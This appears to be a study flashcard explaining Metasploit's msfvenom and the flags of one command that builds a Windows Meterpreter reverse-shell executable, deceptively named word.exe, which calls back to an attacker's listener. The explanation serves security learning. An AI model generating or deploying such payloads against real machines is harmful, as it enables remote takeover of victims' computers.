What is msfvenom, and what does a command like msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<ip> LPORT=444 -o word.exe produce?
msfvenom is Metasploit's payload generator — it builds a standalone malicious file (here a Windows .exe) that opens a reverse shell back to the attacker when run.
What it is:
msfvenom is the payload-and-encoder tool of the Metasploit Framework. It bakes a chosen payload (the code that runs on the victim) into a standalone artifact — an .exe, a script, raw shellcode, an APK, etc. — that can be delivered and executed outside an exploit. It's how the attacker turns "I want a reverse shell" into an actual file to hand the victim.
Decoding the command:
| Flag | Meaning |
|---|---|
-p windows/meterpreter/reverse_tcp |
the payload: a Meterpreter agent that dials back out (reverse shell) |
LHOST=<ip> / LPORT=444 |
the attacker's listener address/port the payload connects to |
-f exe |
output format — a Windows executable |
-o word.exe |
write it to this file (innocuously named) |
So this one line produces word.exe: run it on a Windows box and it connects back to LHOST:LPORT, where the attacker's handler is waiting to open a session.
Why it matters: the LHOST/LPORT chosen here must match the listener (multi/handler) exactly — the payload and the catcher are two halves of the same reverse connection. msfvenom builds the half that runs on the victim; the handler is the half that runs on the attacker.
Tip: msfvenom = the venom you package up; msfconsole = where you sit and wait for it to bite.
Go deeper:
Metasploit Project (Wikipedia) — the framework msfvenom belongs to: payloads, encoders, and the Meterpreter agent.